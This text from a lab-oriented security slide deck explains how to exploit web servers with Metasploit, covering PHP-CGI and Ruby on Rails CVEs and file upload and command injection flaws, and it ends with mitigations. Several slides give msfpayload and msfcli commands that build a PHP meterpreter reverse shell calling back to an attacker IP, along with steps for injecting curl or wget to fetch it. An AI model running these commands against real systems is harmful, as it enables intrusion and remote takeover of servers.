  • 3.  Kali Linux – Our attacker machine  Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.  Metasploitable2 – Victim Web Server
  • 4. Exploiting the backend server through a web application.
  • 5.  Reasons why hackers want to compromise the server:  Run attacks against the internal network  Use the server as a bot  Install backdoors onto the server  Reveal sensitive files/passwords  Execute any local file  Execute remote files  and more…
  • 6.  Vulnerabilities that are dangerous against a server  DirectoryTraversal  Local File Inclusion  Remote File Inclusion  Remote Code Execution  SQL Injection  Command Injection
  • 14.  Metasploit is an open-source framework used for Security development and testing  Information gathering and fingerprinting  Exploitation/Penetration testing  Payload generation and encoding  Fuzzing  And much more…
  • 15.  Command Line Interfaces  msfconsole  msfcli  GUI Interfaces  Metasploit Community Edition  Armitage
  • 16.  Modules  Exploit – Exploitation/Proof-of-Concept code ▪ Ruby on Rails exploit ▪ PHP-CGI exploit  Auxiliary – Misc. modules for multiple purposes ▪ Scanners ▪ DDOS tools ▪ Fingerprinting ▪ Clients  Payloads – Code to be executed on the exploited system ▪ System Shells ▪ Meterpreter Shells  Post – Modules for post-exploitation tasks ▪ Persistence ▪ Password Stealing ▪ Pivoting
  • 17.  Active Exploits  Actively exploit a host.  Ex: Ruby on Rails XML exploit  Passive Exploits  Wait’s for incoming hosts, then exploits them  Ex: Java 0-days  Exploits contain payloads
  • 18.  Inline (Non Staged)  Payload containing the exploit and shell code  Stable  Large size  Staged  Exploits victim, establishes connection with attacker, pulls down the payload  Meterpreter  Advanced, dynamic payload.  Extended over the network  Extensible through modules and plugins
  • 19.  Types of connections  Bind ▪ Local server gets started on victim machine ▪ Attacker connects to victim ▪ windows/x64/shell/bind_tcp  Reverse ▪ Local server gets started on attacker machine ▪ Victim connects to attacker ▪ windows/x64/shell/reverse_tcp
  • 21.  CVE 2012-1823  DOS attack ▪ -T 10000  Source code disclosure ▪ -s argument  Remote Code Execution ▪ -d argument
  • 22.  CVE-2013-0156  Easy to find, easy to exploit, critical vulnerability.  Requires just one POST request containing a specially crafted XML data.  Send commands through YAML objects
  • 23.  The upload functionality allows for any file type to be uploaded 1. Upload server-side code and check if it executes ▪ PHP = <?php echo “HelloWorld!”; ?> ▪ ASP = <% Response.Write "HelloWorld!" %> ▪ JSP = <%= new java.util.Date().toString() %> 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Upload the shell and execute it
  • 24.  Allows an attacker to execute system level commands. 1. Attempt a safe command 1. echo test 2. uname -a 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Inject curl or wget commands to download the shell onto the victim machine. 5. Chmod if necessary and execute
  • 25.  msfpayload php/meterpreter/reverse_tcp O  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337O  msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php  # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.  ==================================  msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
  • 27.  Keep software up to date!  PHP: 5.4.3, 5.3.13  Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15  Use whitelisting for file upload extensions  Watch for extensions and content-types  Don’t let upload directory be executable  Rename files if possible  Don’t pass user input as a system command!  Use library calls when possible  Sanitize input
  • 29.  BackTrack-Linux  http://www.kali.org/  The Metasploit Project  http://www.metasploit.com/  Metasploit Unleashed  http://www.offensive-security.com/metasploit-unleashed/  PHP-CGI Advisory  http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  Ruby on Rails Exploitation  https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with- metasploit-cve-2013-0156  DamnVulnerable Web Application (DVWA)  http://www.dvwa.co.uk/  Metasploitable 2  http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web